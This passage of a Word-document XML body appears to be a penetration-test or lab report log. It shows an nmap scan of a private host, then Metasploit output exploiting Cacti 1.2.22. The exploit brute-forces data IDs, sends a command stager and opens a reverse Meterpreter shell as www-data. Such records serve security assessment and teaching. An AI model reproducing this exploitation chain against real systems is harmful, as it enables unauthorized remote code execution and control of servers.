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07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Sun Jul  7 02:13:10 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00066s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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Sun Jul  7 02:13:17 2024 -- 1 IP address (1 host up) scanned in 7.79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Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[+] The target appears to be vulnerable. The target is Cacti version 1.2.22</w:t>
        <w:br/>
        <w:t>[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations</w:t>
        <w:br/>
        <w:t>[*] Enumerating local_data_id values for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:38684) at 2024-07-07 02:16:30 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                   Information            Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                   -----------            ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/linux  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt; 10.33.102.225:38684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